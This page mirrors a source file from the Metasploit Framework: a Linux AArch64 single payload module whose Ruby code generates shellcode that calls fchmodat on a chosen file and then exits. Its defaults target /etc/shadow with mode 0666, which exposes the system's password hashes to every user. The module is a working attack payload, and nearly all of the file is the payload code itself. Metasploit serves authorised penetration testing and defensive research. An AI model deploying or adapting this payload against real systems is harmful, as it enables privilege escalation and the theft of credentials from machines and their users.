Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/linux/aarch64/chmod.rb
31164 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7
  CachedSize = 48

8


9
  include Msf::Payload::Single

10
  include Msf::Payload::Linux::Aarch64::Prepends

11


12
  def initialize(info = {})

13
    super(

14
      merge_info(

15
        info,

16
        'Name' => 'Linux Chmod',

17
        'Description' => 'Runs chmod on the specified file with specified mode.',

18
        'Author' => 'bcoles',

19
        'License' => MSF_LICENSE,

20
        'Platform' => 'linux',

21
        'Arch' => ARCH_AARCH64,

22
        'References' => [

23
          ['URL', 'https://man7.org/linux/man-pages/man2/fchmodat.2.html'],

24
          ['URL', 'https://github.com/bcoles/shellcode/blob/main/aarch64/chmod/chmod.s'],

25
        ]

26
      )

27
    )

28
    register_options([

29
      OptString.new('FILE', [ true, 'Filename to chmod', '/etc/shadow' ]),

30
      OptString.new('MODE', [ true, 'File mode (octal)', '0666' ]),

31
    ])

32
  end

33


34
  # @return [String] the full path of the file to be modified

35
  def chmod_file_path

36
    datastore['FILE'] || ''

37
  end

38


39
  # @return [Integer] the desired mode for the file

40
  def mode

41
    (datastore['MODE'] || '0666').oct

42
  rescue StandardError => e

43
    raise ArgumentError, "Invalid chmod mode '#{datastore['MODE']}': #{e.message}"

44
  end

45


46
  # @return [Integer] AArch64 instruction to load mode into x2 register

47
  # For example: 0xd28036c2 ; mov x2, #0x1b6 ; loads 0x1b6 (0o666) into x2

48
  def chmod_instruction(mode)

49
    (0xd2800000 | ((mode & 0xffff) << 5) | 2)

50
  end

51


52
  def generate(_opts = {})

53
    raise ArgumentError, "chmod mode (#{mode}) is greater than maximum mode size (0x7FF)" if mode > 0x7FF

54


55
    shellcode = [

56
      0x92800c60, # mov x0, #0xffffffffffffff9c // #-100

57
      0x10000101, # adr x1, 40009c <path>

58
      chmod_instruction(mode), # mov x2, <mode>

59
      0xd2800003, # mov x3, #0

60
      0xd28006a8, # mov x8, #0x35 # __NR_fchmodat

61
      0xd4000001, # svc #0

62
      0xd2800000, # mov x0, #0

63
      0xd2800ba8, # mov x8, #0x5d # __NR_exit

64
      0xd4000001  # svc #0

65
    ].pack('V*')

66
    shellcode += chmod_file_path + "\x00"

67


68
    # align our shellcode to 4 bytes

69
    shellcode += "\x00" while shellcode.bytesize % 4 != 0

70


71
    super.to_s + shellcode

72
  end

73
end

74


75